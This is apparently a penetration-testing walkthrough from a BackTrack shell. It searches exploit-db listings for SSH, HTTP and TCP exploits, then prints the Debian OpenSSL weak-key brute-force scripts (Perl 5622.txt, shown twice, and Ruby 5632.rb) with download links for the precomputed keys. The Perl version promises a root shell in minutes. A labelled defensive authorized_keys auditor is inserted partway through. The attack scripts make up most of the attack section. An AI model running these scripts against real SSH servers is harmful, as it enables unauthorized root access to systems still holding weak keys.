Privilege escalation
In this privilege escalation exercise, we first scan the IP addresses which we will exploit; in this case I use the tools Zenmap and nessusd.
Then search for the SSH service in the existing exploitdb:
root@bt:/pentest/exploits/exploitdb# ./searchsploit ssh
Description    Path
----------------------------------------------------------------------------------------------------
OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool    /linux/remote/25.c
OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)    /linux/remote/26.sh
glibc-2.2 and openssh-2.3.0p1 exploits glibc >= 2.1.9x    /linux/local/258.sh
SSH (x2) Remote Root Exploit    /multiple/remote/349.txt
Dropbear SSH <= 0.34 Remote Root Exploit    /linux/remote/387.c
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)    /php/webapps/740.pl
Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service    /multiple/dos/1572.pl
freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit    /windows/remote/1787.py
OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit    /multiple/dos/2444.sh
Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit    /multiple/remote/3303.sh
Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit    /multiple/remote/3303.sh
IpSwitch WS_FTP Server with SSH 6.1.0.0 Remote Buffer Overflow PoC    /windows/dos/5044.pl
Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability    /php/webapps/5335.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit    /multiple/remote/5622.txt
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (ruby)    /multiple/remote/5632.rb
freeSSHd 1.2.1 Remote Stack Overflow PoC (auth)    /windows/dos/5709.pl
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)    /linux/remote/5720.py
freeSSHd 1.2.1 (Post Auth) Remote SEH Overflow Exploit    /windows/remote/5751.pl
Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)    /linux/remote/6094.txt
freeSSHd 1.2.1 sftp rename Remote Buffer Overflow PoC (auth)    /windows/dos/6800.pl
GoodTech SSH (SSH_FXP_OPEN) Remote Buffer Overflow Exploit    /windows/remote/6804.pl
freeSSHd 1.2.1 sftp realpath Remote Buffer Overflow PoC (auth)    /windows/dos/6812.pl
FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)    /windows/remote/8295.pl
ProSSHD v1.2 20090726 Buffer Overflow Exploit    /windows/remote/11618.pl
FreeSSHD 1.2.4 Remote Buffer Overflow DoS    /windows/dos/11842.py
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)    /windows/remote/12495.pl
linux/x86 append rsa key to /root/.ssh/authorized_keys2 295 bytes    /lin/x86/shellcode/13330.c
Novell Netware v6.5 OpenSSH Remote Stack Overflow    /novell/dos/14866.txt
SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow    /windows/remote/16460.rb
FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow    /windows/remote/16461.rb
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD    /freebsd/remote/17462.txt
FreeSSHd Remote Denial of Service    /windows/dos/18268.txt
Next, go to the remote directory in exploitdb:
root@bt:/pentest/exploits/exploitdb# cd platforms/multiple/remote
and open the exploit file 5622.txt:
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# cat 5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
            http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break)
4. Run the perl script and give it the location to where you extracted the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
  print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
  print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
  print "By mm@deadbeef.de\n";
  exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
  chomp;
  next unless m,^\d+$,;
  push(@a, $_);
  if (scalar(@a) > $keysPerConnect) {
    system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
    @a = ();
  }
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de
View the contents of the remote directory:
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# ls
10001.txt 12122.txt 14875.txt 16294.rb 16316.rb 1794.pm 3269.pl 3708.htm 5790.txt 828.c 9941.rb
10015.txt 12263.txt 15005.txt 16295.rb 16317.rb 17969.py 3303.sh 4093.pl 6122.rb 8458.txt 9942.rb
10071.txt 12264.txt 15298.txt 16297.rb 16318.rb 1799.txt 3358.pl 4266.py 6123.py 86.c 9943.rb
1007.html 12304.txt 15617.txt 16298.rb 16319.rb 18171.rb 3359.pl 4391.c 6130.c 8786.txt 9944.rb
10086.txt 12343.txt 15717.txt 16299.rb 16324.rb 18245.py 3363.pl 4399.html 6229.txt 879.pl 9945.rb
10087.txt 1263.pl 15937.pl 16300.rb 16495.rb 1997.php 3375.pl 4530.pl 6236.txt 8907.txt 9946.rb
10093.txt 12804.txt 1602.c 16301.rb 16784.rb 2017.pl 3376.pl 4556.txt 67.c 9039.txt 9948.rb
10095.txt 1292.pm 16041.txt 16302.rb 16789.rb 201.c 3377.pl 4567.pl 689.pl 95.c 9949.rb
10579.py 1369.html 16103.txt 16303.rb 16870.rb 2053.rb 3378.pl 4673.rb 705.pl 9651.txt 9951.rb
1114.c 13787.txt 16137.c 16304.rb 16985.rb 2061.txt 3405.txt 4761.pl 745.cgi 9718.txt 9972.c
11203.py 13850.pl 16286.rb 16305.rb 16990.rb 2082.html 3425.txt 4877.txt 746.pl 9829.txt 9987.txt
11662.txt 14360.txt 16287.rb 16308.rb 17068.py 2784.html 3452.php 5215.txt 7760.php 9843.txt 9993.txt
11817.txt 14386.html 16288.rb 16309.rb 17078.java 2837.sql 349.txt 5257.py 7781.txt 9913.rb 9994.txt
11856.txt 14387.html 16290.rb 16310.rb 17148.rb 2951.sql 3555.pl 5430.txt 8037.txt 9915.rb 9995.txt
1188.c 14388.html 16291.rb 16312.rb 17535.rb 300.c 3584.pl 5534.txt 805.c 9934.rb 9997.txt
12033.txt 14602.txt 16292.rb 16314.rb 17691.rb 3064.rb 3585.pl 5622.txt 8097.txt 9935.rb
12114.txt 14641.py 16293.rb 16315.rb 1791.patch 311.pl 3654.pl 5632.rb 8191.txt 9937.rb
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# cat 5622.txt
the debian openssl issue leads that there are only 65.536 possible ssh
keys generated, cause the only entropy is the pid of the process
generating the key.

This leads to that the following perl script can be used with the
precalculated ssh keys to brute force the ssh login. It works if such a
keys is installed on a non-patched debian or any other system manual
configured to.

On an unpatched system, which doesn't need to be debian, do the following:

keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/

1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2
            http://exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
2. Extract it to a directory
3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 Bits, generated on an upatched debian (this is the key this exploit will break)
4. Run the perl script and give it the location to where you extracted the bzip2 mentioned.

#!/usr/bin/perl
my $keysPerConnect = 6;
unless ($ARGV[1]) {
  print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
  print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
  print "By mm@deadbeef.de\n";
  exit 0;
}
chdir($ARGV[0]);
opendir(A, $ARGV[0]) || die("opendir");
while ($_ = readdir(A)) {
  chomp;
  next unless m,^\d+$,;
  push(@a, $_);
  if (scalar(@a) > $keysPerConnect) {
    system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
    @a = ();
  }
}

5. Enjoy the shell after some minutes (less than 20 minutes)

Regards,
Markus Mueller
mm@deadbeef.de

# milw0rm.com [2008-05-15]
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# cat
Display all 186 possibilities? (y or n)
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# cat 56
5622.txt 5632.rb
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote# cat 5632.rb
#!/usr/bin/ruby
#
# Debian SSH Key Tester
# L4teral <l4teral [at] gmail com>
#
# This tool helps to find user accounts with weak SSH keys
# that should be regenerated with an unaffected version
# of openssl.
#
# You will need the precalculated keys provided by HD Moore
# See http://metasploit.com/users/hdm/tools/debian-openssl/
# for further information.
#
# Usage:
# debian_openssh_key_test.rb <host> <user> <keydir>
#

require 'thread'

THREADCOUNT = 10
KEYSPERCONNECT = 3

queue = Queue.new
threads = []
keyfiles = []

host = ARGV.shift or raise "no host given!"
user = ARGV.shift or raise "no user given!"
keysdir = ARGV.shift or raise "no key dir given!"

Dir.new(keysdir).each do |f|
  if f =~ /\d+$/ then
    keyfiles << f
    queue << f
  end
end

totalkeys = queue.length
currentkey = 1

THREADCOUNT.times do |i|
  threads << Thread.new(i) do |j|
    while !queue.empty?
      keys = []
      KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
      keys.map! { |f| f = File.join(keysdir, f) }
      keys.each do |k|
        puts "testing key #{currentkey}/#{totalkeys} #{k}..."
        currentkey += 1
      end
      system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
      if $? == 0 then
        keys.each do |k|
          system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
          if $? == 0 then
            puts "KEYFILE FOUND: \n#{k}"
            exit
          end
        end
      end
    end
  end
end

trap("SIGINT") do
  threads.each { |t| t.exit() }
  exit
end

threads.each { |t| t.join }

# milw0rm.com [2008-05-16]
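The tester above looks for weak keys by attempting logins over the network; an administrator can answer the same question on the server itself by fingerprinting every authorized_keys entry and comparing it with a blocklist of known-weak key fingerprints. The following is an added example, not part of the original post or of the exploit-db files: all function names are hypothetical, and the sample keys and the blocklist are constructed (the moduli are not real RSA keys). It assumes the defender has prepared the blocklist as MD5 fingerprints of the known-weak public keys.

```ruby
require 'base64'
require 'digest/md5'
require 'set'

# Added example (not from the original post). All names are hypothetical.
KEY_TYPES = %w[ssh-rsa ssh-dss].freeze

# Read one SSH wire-format string (uint32 big-endian length, then bytes).
def read_string(buf, off)
  raise ArgumentError, 'truncated key blob' if off + 4 > buf.bytesize
  len = buf.byteslice(off, 4).unpack1('N')
  raise ArgumentError, 'truncated key blob' if off + 4 + len > buf.bytesize
  [buf.byteslice(off + 4, len), off + 4 + len]
end

# Parse one authorized_keys line into key type, RSA modulus size, MD5
# fingerprint and comment. Returns nil for comments, blank lines and junk.
def parse_entry(line)
  line = line.strip
  return nil if line.empty? || line.start_with?('#')
  tokens = line.split(/\s+/)
  # Options (command="...", no-pty, ...) may precede the key type.
  idx = tokens.index { |t| KEY_TYPES.include?(t) }
  return nil if idx.nil? || tokens[idx + 1].nil?
  blob = Base64.strict_decode64(tokens[idx + 1])
  type, off = read_string(blob, 0)
  return nil unless type == tokens[idx] # declared type must match the blob
  bits = nil
  if type == 'ssh-rsa'
    _exponent, off = read_string(blob, off)
    modulus, = read_string(blob, off)
    bits = modulus.unpack1('H*').to_i(16).bit_length
  end
  md5 = Digest::MD5.hexdigest(blob)
  { type: type, bits: bits, md5: md5,
    display: md5.scan(/../).join(':'), # colon-separated MD5 form
    comment: tokens[(idx + 2)..-1].join(' ') }
rescue ArgumentError
  nil # bad base64 or truncated blob
end

# Return one finding per entry whose MD5 fingerprint is on the blocklist.
def audit_authorized_keys(text, blocklist)
  findings = []
  text.each_line.with_index(1) do |line, lineno|
    entry = parse_entry(line)
    next if entry.nil? || !blocklist.include?(entry[:md5])
    findings << entry.merge(line: lineno)
  end
  findings
end

# --- constructed sample data (the moduli are not real RSA keys) ---
def mpint(int)
  hex = int.to_s(16)
  hex = "0#{hex}" if hex.length.odd?
  bytes = [hex].pack('H*')
  bytes = "\x00".b + bytes if (bytes.getbyte(0) & 0x80) != 0
  [bytes.bytesize].pack('N') + bytes
end

def sample_pubkey(modulus, comment)
  blob = [7].pack('N') + 'ssh-rsa' + mpint(65_537) + mpint(modulus)
  "ssh-rsa #{Base64.strict_encode64(blob)} #{comment}"
end

WEAK_KEY = sample_pubkey((1 << 2047) | 0xC0FFEE, 'root@oldbox')
GOOD_KEY = sample_pubkey((1 << 2047) | 0xBADC0DE, 'alice@laptop')
SAMPLE_AUTHORIZED_KEYS = <<~KEYS
  # constructed sample file
  #{GOOD_KEY}
  command="/usr/bin/rsync --server",no-pty #{WEAK_KEY}
  this line is not a key
KEYS
# Constructed blocklist: pretend WEAK_KEY is one of the known-weak keys.
SAMPLE_BLOCKLIST = Set[parse_entry(WEAK_KEY)[:md5]]

audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, SAMPLE_BLOCKLIST).each do |f|
  puts "line #{f[:line]}: #{f[:type]} #{f[:bits]} bits #{f[:display]} (#{f[:comment]})"
end
```

Any entry this reports should be removed from authorized_keys and the key pair regenerated with an unaffected version of openssl, as the tester's header comment says.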
root@bt:/pentest/exploits/exploitdb# ./searchsploit http
Description    Path
----------------------------------------------------------------------------------------------------
Apache HTTP Server 2.x Memory Leak Exploit    /windows/dos/9.c
Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit    /hardware/remote/77.c
Lexmark Multiple HTTP Servers Denial of Service Vulnerability    /hardware/dos/358.txt
Apache HTTPd Arbitrary Long HTTP Headers DoS    /multiple/dos/360.pl
Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)    /linux/dos/371.c
WordPress Blog HTTP Splitting Vulnerability    /php/webapps/570.txt
Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit    /windows/dos/667.c
OpenText FirstClass 8.0 HTTP Daemon /Search Remote DoS    /windows/dos/687.c
Apache <= 2.0.52 HTTP GET request Denial of Service Exploit    /multiple/dos/855.pl
Sumus 0.2.2 httpd Remote Buffer Overflow Exploit    /linux/remote/940.c
MailEnable Enterprise & Professional https Remote BoF Exploit    /windows/remote/952.pl
Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service    /multiple/dos/1056.pl
Small HTTP Server <= 3.05.28 Arbitrary Data Execution Exploit    /windows/remote/1108.pl
Acunetix HTTP Sniffer Denial of Service Exploit    /windows/dos/1137.pl
Hasbani-WindWeb/2.0 - HTTP GET Remote DoS    /hardware/dos/1274.c
Oracle 9.2.0.1 Universal XDB HTTP Pass Overflow Exploit    /windows/remote/1365.pm
MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c)    /windows/dos/1376.c
MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl)    /windows/dos/1377.pl
MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp)    /windows/dos/1396.cpp
zawhttpd <= 0.8.23 (GET) Remote Buffer Overflow DoS    /linux/dos/1746.pl
gxine 0.5.6 (HTTP Plugin) Remote Buffer Overflow PoC    /linux/dos/1852.c
ImgSvr <= 0.6.5 (long http post) Denial of Service Exploit    /windows/dos/1980.pl
Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit    /linux/remote/2274.c
Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2    /windows/remote/2277.c
RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution Exploit    /windows/remote/2328.php
SHTTPD 1.34 (POST) Remote Buffer Overflow Exploit    /windows/remote/2482.pl
MiniHttpServer Web Forum & File Sharing Server 4.0 Add User Exploit    /windows/remote/2651.c
HTTP Upload Tool (download.php) Information Disclosure Vulnerability    /php/webapps/2791.txt
Http explorer Web Server 1.02 Directory Transversal Vulnerability    /windows/remote/2974.pl
Acunetix WVS <= 4.0 20060717 HTTP Sniffer Component Remote DoS    /windows/dos/3078.pl
Sami HTTP Server 2.0.1 (HTTP 404 - Object not found) DoS Exploit    /windows/dos/3182.py
Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)    /osX/dos/3200.rb
PHP-Nuke <= 8.0 Final (HTTP Referers) Remote SQL Injection Exploit    /php/webapps/3346.pl
Wserve HTTP Server 4.6 (Long Directory Name) Denial of Service Exploit    /windows/dos/3674.pl
Sami HTTP Server 2.0.1 POST Request Denial of Service Exploit    /windows/dos/3715.py
Versalsoft HTTP File Upload ActiveX 6.36 (AddFile) Remote DoS Exploit    /windows/dos/3866.html
MiniWeb Http Server 0.8.x Remote Denial of Service Exploit    /windows/dos/4046.pl
Versalsoft HTTP File Uploader AddFile() Remote Buffer Overflow Exploit    /windows/remote/4200.html
corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit    /linux/remote/4243.c
EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method    /windows/remote/4290.html
Lighttpd <= 1.4.16 FastCGI Header Overflow Remote Exploit    /multiple/remote/4391.c
Airsensor M520 HTTPD Remote Preauth DoS / BOF PoC    /hardware/dos/4426.pl
Lighttpd <= 1.4.17 FastCGI Header Overflow Remote Exploit    /linux/remote/4437.c
Boa 0.93.15 HTTP Basic Authentication Bypass Exploit    /linux/remote/4542.py
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities    /windows/remote/4700.txt
Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities    /windows/remote/4700.txt
Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit    /windows/dos/4717.py
RaidenHTTPD 2.0.19 (ulang) Remote Command Execution Exploit    /windows/remote/4747.vbs
Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability    /multiple/remote/5215.txt
ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite Exploit    /windows/remote/5338.html
Novel eDirectory HTTP Denial of Service Exploit    /windows/dos/5344.py
VLC 0.8.6d httpd_FileCallBack Remote Format String Exploit    /windows/remote/5519.c
Novell eDirectory < 8.7.3 SP 10 / 8.8.2 HTTP headers DOS Vulnerability    /windows/dos/5547.txt
uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 Range header DoS Exploit    /windows/dos/5918.pl
IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit    /windows/remote/6227.c
Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC    /hardware/dos/6394.pl
Cisco Router HTTP Administration CSRF Command Execution Exploit    /hardware/remote/6476.html
Cisco Router HTTP Administration CSRF Command Execution Exploit 2    /hardware/remote/6477.html
fhttpd 0.4.2 un64() Remote Denial of Service Exploit    /linux/dos/6493.pl
Linksys Wireless ADSL Router (WAG54G V.2) httpd DoS Exploit    /hardware/dos/7535.php
EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vuln    /windows/remote/7762.html
Squid < 3.1 5 HTTP Version Number Parsing Denial of Service Exploit    /multiple/dos/8021.pl
GeoVision Digital Video Surveillance System (geohttpserver) DT Vuln    /windows/remote/8041.txt
MLdonkey <= 2.9.7 HTTP DOUBLE SLASH Arbitrary File Disclosure Vuln    /multiple/remote/8097.txt
Wordpress MU < 2.7 'HOST' HTTP Header XSS Vulnerability    /php/webapps/8196.txt
SW-HTTPD Server 0.x Remote Denial of Service Exploit    /multiple/dos/8245.c
Sami HTTP Server 2.x (HEAD) Remote Denial of Service Exploit    /windows/dos/8310.pl
Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow    /hardware/dos/8313.txt
Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]    /windows/remote/8421.py
Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]    /windows/remote/8422.py
Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service    /windows/dos/8522.pl
Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit    /windows/remote/8554.py
httpdx <= 0.5b Multiple Remote Denial of Service Vulnerabilities    /windows/dos/8712.txt
httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)    /windows/remote/8716.py
httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)    /windows/remote/8732.py
Lighttpd < 1.4.23 Source Code Disclosure Vulnerability (BSD/Solaris bug)    /multiple/remote/8786.txt
httpdx <= 0.8 FTP Server Delete/Get/Create Directories/Files Exploit    /windows/remote/8897.c
Multiple HTTP Server Low Bandwidth Denial of Service (slowloris.pl)    /multiple/dos/8976.pl
Multiple HTTP Server Low Bandwidth Denial of Service #2    /multiple/dos/8991.php
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command Execution Vulnerability    /hardware/remote/9209.txt
HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit    /windows/dos/9478.pl
MailEnable 1.52 HTTP Mail Service Stack BOF Exploit PoC    /windows/dos/9549.c
Xerver HTTP Server 4.32 Arbitrary Source Code Disclosure Vuln    /windows/remote/9649.txt
httpdx Web Server 1.4 (Host Header) Remote Format String DoS Exploit    /windows/dos/9657.pl
Techlogica HTTP Server 1.03 Arbitrary File Disclosure Exploit    /windows/remote/9660.pl
Xerver HTTP Server <= v4.32 Remote Denial of Service    /windows/dos/9717.txt
Xerver HTTP Server <= v4.32 Remote Denial of Service    /windows/dos/9717.txt
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability    /multiple/remote/9718.txt
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability    /multiple/remote/9718.txt
httpdx <= 1.4.6b source disclosure    /windows/webapps/9885.txt
httpdx 1.4 h_handlepeer BoF    /windows/remote/9886.txt
MiniShare HTTP 1.5.5 BoF    /windows/remote/9896.txt
DD-WRT HTTP v24-SP1 Command Injection Vulnerability    /linux/remote/10030.rb
Femitter HTTP Server 1.03 Remote Source Disclosure    /windows/remote/10047.txt
httpdx 1.4 Get Request Buffer Overflow    /windows/remote/10053.txt
Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability    /windows/dos/10163.pl
OrzHTTPd Format String Exploit    /linux/remote/10282.py
iWeb HTTP Server Directory Transversal Vulnerability    /windows/webapps/10331.txt
CoreHTTP web server off-by-one buffer overflow vulnerability    /linux/dos/10349.py
Monkey HTTP Daemon < 0.9.3 Denial of Service Vulnerability    /linux/dos/10469.py
CoreHTTP Arbitrary Command Execution Vulnerability    /linux/remote/10610.rb
Multiple Media Player HTTP DataHandler Overflow (Itunes    /multiple/dos/11142.txt
cPanel HTTP Response Splitting Vulnerability    /multiple/webapps/11211.txt
P2GChinchilla HTTP Server v1.1.1 Denial Of Service Exploit    /windows/dos/11254.pl
Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS Exploit    /hardware/dos/11273.py
httpdx v1.5.2 Remote Pre-Authentication DoS (PoC crash)    /windows/dos/11343.py
Apple Iphone/Ipod - FTP On The Go 2.1.2 - HTTP Remote DoS    /hardware/dos/11472.py
Easy~Ftp Server v1.7.0.2 (HTTP) Remote BOF Exploit    /windows/remote/11500.py
RCA DCM425 Cable Modem micro_httpd DoS/PoC    /hardware/dos/11597.py
httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)    /windows/dos/11734.py
uhttp Server Path Traversal Vulnerability    /multiple/remote/11856.txt
MultiThreaded HTTP Server v1.1 Directory Traversal    /multiple/remote/12304.txt
MultiThreaded HTTP Server v1.1 Source Disclosure    /windows/remote/12308.txt
MultiThreaded HTTP Server v1.1 Directory Traversal    /windows/remote/12331.txt
GeoHttpServer Remote DoS Vulnerability    /windows/dos/12531.pl
nginx [engine x] http server <= 0.6.36 Path Draversal    /multiple/remote/12804.txt
Utility for generating HTTP/1.x requests for shellcodes    /generator/shellcode/13288.c
linux/x86 shellcode that forks a HTTP Server on port tcp/8800 166 bytes    /lin/x86/shellcode/13308.c
linux/x86 HTTP/1.x GET    /lin/x86/shellcode/13355.c
linux/x86 HTTP/1.x GET    /lin/x86/shellcode/13380.c
Motorola SB5101 Hax0rware Rajko HTTPD Remote Exploit PoC    /hardware/dos/13774.pl
QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS    /hardware/dos/13870.py
SasCam v2.6.5 Remote HTTP Server Crash    /windows/dos/13888.c
Weborf HTTP Server Denial of Service Vulnerability    /multiple/dos/14012.txt
UPlusFTP Server v1.7.1.01 [ HTTP ] Remote Buffer Overflow [ Post Auth ]    /windows/remote/14496.py
Xerver 4.32 Source Disclosure and HTTP Authentication Bypass    /windows/remote/14522.rb
Msxml2.XMLHTTP.3.0 Response Handling Memory Corruption (MS10-051)    /windows/dos/14609.py
Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC    /windows/dos/14683.py
Mereo v1.9.2 Remote HTTP Server Denial Of Service Vulnerability    /windows/dos/14840.py
Integard Home and Pro v2 Remote HTTP Buffer Overflow Exploit    /win32/remote/14941.rb
Oracle Sun Java System Web Server - HTTP Response Splitting    /jsp/webapps/15290.txt
HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS    /windows/dos/15307.py
Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit    /windows/dos/15422.pl
HttpBlitz Web Server Denial Of Service Exploit    /windows/dos/15821.py
httpdASM 0.92 Directory Traversal    /windows/remote/15861.txt
LifeType 1.2.10 HTTP Referer stored XSS    /php/webapps/15981.txt
Caedo HTTPd Server v 0.5.1 ALPHA Remote File Download    /windows/remote/16075.pl
SDP Downloader 2.3.0 (http_response) Remote Buffer Overflow Exploit    /windows/remote/16078.py
Majordomo2 - Directory Traversal (SMTP/HTTP)    /multiple/remote/16103.txt
Majordomo2 - Directory Traversal (SMTP/HTTP)    /multiple/remote/16103.txt
JAKCMS 2.0 PRO RC5 stored XSS via useragent HTTP header Injection    /php/webapps/16128.txt
Icy Phoenix 1.3.0.53a HTTP Referer stored XSS    /php/webapps/16199.txt
Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow    /windows/remote/16513.rb
Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)    /windows/remote/16526.rb
Internet Explorer XML Core Services HTTP Request Handling    /windows/remote/16532.rb
Persits XUpload ActiveX MakeHttpRequest Directory Traversal    /windows/remote/16598.rb
HTTPDX tolog() Function Format String Vulnerability    /windows/remote/16732.rb
SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)    /win32/remote/16759.rb
HTTPDX tolog() Function Format String Vulnerability    /windows/remote/16794.rb
HTTPDX h_handlepeer() Function Buffer Overflow    /windows/remote/16799.rb
Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow    /windows/remote/16800.rb
Webster HTTP Server GET Buffer Overflow    /windows/remote/16802.rb
Oracle 9i XDB HTTP PASS Overflow (win32)    /win32/remote/16809.rb
DD-WRT HTTP Daemon Arbitrary Command Execution    /cgi/webapps/16856.rb
MacOS X EvoCam HTTP GET Buffer Overflow    /osX/remote/16874.rb
Oracle WebLogic Session Fixation Via HTTP POST    /multiple/webapps/16959.txt
Kolibri <= v2.0 HTTP Server HEAD Buffer Overflow    /windows/remote/16970.rb
jHTTPd 0.1a Directory Traversal Vulnerability    /multiple/remote/17068.py
ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS    /php/webapps/17200.txt
Oracle HTTP Server XSS Header Injection    /multiple/webapps/17393.txt
Simple HTTPd 1.42 Denial of Servive Exploit    /windows/dos/17658.py
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability    /windows/remote/17669.py
Apache httpd Remote Denial of Service (memory exhaustion)    /multiple/dos/17696.pl
Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit    /windows/remote/17721.rb
Toko Lite CMS 1.5.2 (edit.php) HTTP Response Splitting Vulnerability    /php/webapps/17859.txt
FleaHttpd Remote Denial Of Service Exploit    /linux/dos/18120.py
Apache HTTP Server Denial of Service    /linux/dos/18221.c
lighttpd Denial of Service Vulnerability PoC    /linux/dos/18295.
root@bt:/pentest/exploits/exploitdb# ./searchsploit tcp
Description    Path
----------------------------------------------------------------------------------------------------
tcpdump ISAKMP Identification payload Integer Overflow Exploit    /linux/remote/171.c
Linux Kernel 2.2 (TCP/IP Weakness) Exploit    /linux/remote/237.c
MS Windows 2K/XP TCP Connection Reset Remote Attack Tool    /windows/dos/276.delphi
TCP Connection Reset Remote Exploit    /linux/remote/291.c
TCP SYN Denial of Service Exploit (bang.c)    /bsd/dos/343.c
OpenBSD 2.0 - 3.6 TCP TIMESTAMP Remote Denial of Service Exploit    /bsd/dos/869.c
Ethereal / tcpdump (rsvp_print) Infinite Loop Denial of Service Exploit    /multiple/dos/956.c
Tcpdump 3.8.x (ldp_print) Infinite Loop Denial of Service Exploit    /linux/dos/957.c
Tcpdump 3.8.x (rt_routing_info) Infinite Loop Denial of Service Exploit    /linux/dos/958.c
Tcpdump 3.8.x/3.9.1 (isis_print) Infinite Loop DoS Exploit    /linux/dos/959.c
